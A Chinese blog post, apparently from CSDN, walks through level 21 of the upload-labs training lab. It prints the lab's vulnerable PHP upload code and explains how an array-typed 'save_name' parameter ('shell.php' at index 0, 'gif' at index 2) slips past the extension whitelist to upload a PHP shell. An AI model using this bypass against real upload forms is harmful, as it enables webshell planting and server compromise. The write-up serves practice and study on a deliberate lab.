upload-labs第21关分析与答案

文章详细分析了PHP代码中的文件上传安全漏洞,通过测试发现数组处理逻辑中的安全问题,展示了如何构造payload利用此漏洞上传shell.php文件。作者使用burpsuite抓包并演示了整个攻击过程和修复建议。
摘要由CSDN通过智能技术生成

upload-labs第21关审计1

第二十一关的参考代码
$is_upload = false;
$msg = null;
if(!empty($_FILES['upload_file'])){
    //检查MIME
    $allow_type = array('image/jpeg','image/png','image/gif');
    if(!in_array($_FILES['upload_file']['type'],$allow_type)){
        $msg = "禁止上传该类型文件!";
    }else{
        //检查文件名
        $file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];
        if (!is_array($file)) {
            $file = explode('.', strtolower($file));
        }

        $ext = end($file);
        $allow_suffix = array('jpg','png','gif');
        if (!in_array($ext, $allow_suffix)) {
            $msg = "禁止上传该后缀文件!";
        }else{
            $file_name = reset($file) . '.' . $file[count($file) - 1];
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' .$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $msg = "文件上传成功!";
                $is_upload = true;
            } else {
                $msg = "文件上传失败!";
            }
        }
    }
}else{
    $msg = "请选择要上传的文件!";
}
第一步 分析if…else…分支

在第11行代码处,我们看到他做了一个判断,用is_array()函数判断了post请求传进来的参数是不是一个数组。

由此,我们就思考:post请求能不能传数组的类型参数呢

写一段简单的php代码测试一下

<?php
$file_name = $_POST['name'];
echo $file_name;
// var_dump($file_name)
?>

正常情况下的请求

在这里插入图片描述

下面我们来看看输入的post参数是数组会怎么样呢?

把代码写成

<?php
$file_name = $_POST['name'];
// echo $file_name;
var_dump($file_name)
?>

结果:

在这里插入图片描述

由此我们知道了post请求体是可以传数组

第二步 发现漏洞

我们去下面的判断找寻可能的漏洞

$ext = end($file); // 取数组最后一个
$allow_suffix = array('jpg','png','gif'); // 类型的白名单数组
if (!in_array($ext, $allow_suffix)) {
		$msg = "禁止上传该后缀文件!";
}

这段代码判断的是数组最后一个是不是在array('jpg','png','gif')这个数组中。

思考:

我们是不是可以在传参数的时候数组前面的是shell.php,而让最后一个是jpg,png,gif其中的一个实现绕过呢

再来看else的分支

$file_name = reset($file) . '.' . $file[count($file) - 1];

第一句就暴露了漏洞所在他用到的是reset()函数,取到的是数组第一个值。后面的count()是计算数组长度的,长度-1理论上应该与end()函数的值相同,但真的如此吗?

我们测试一下

<?php
$array_name = array();
$array_name[0]='zhangsan';
$array_name[2]='lisi';
echo reset($array_name).'<br>',end($array_name).'<br>',$array_name[count($array_name)-1] ;

?>

结果:
在这里插入图片描述

可见长度-1的参数竟然是undefined

第三步 构造payload

启动burpsuite截取上传文件时流量

在这里插入图片描述

发送到repeater模块修改参数

在这里插入图片描述

最后访问 upload/shell.php.文件

在这里插入图片描述

完成!!!

总结

payload为

$save_name=array();
$save_name[0]='shell.php';
$save_name[2]='gif';

这样的一个数组

在拼接的时候

$file_name = reset($file) . '.' . $file[count($file) - 1];
// reset($file)是数组第一个值 shell.php
// $file[count($file) - 1]是undefined 为空值

这样我们的文件名 拼接出来就是shell.php.

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

零星_AagT

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值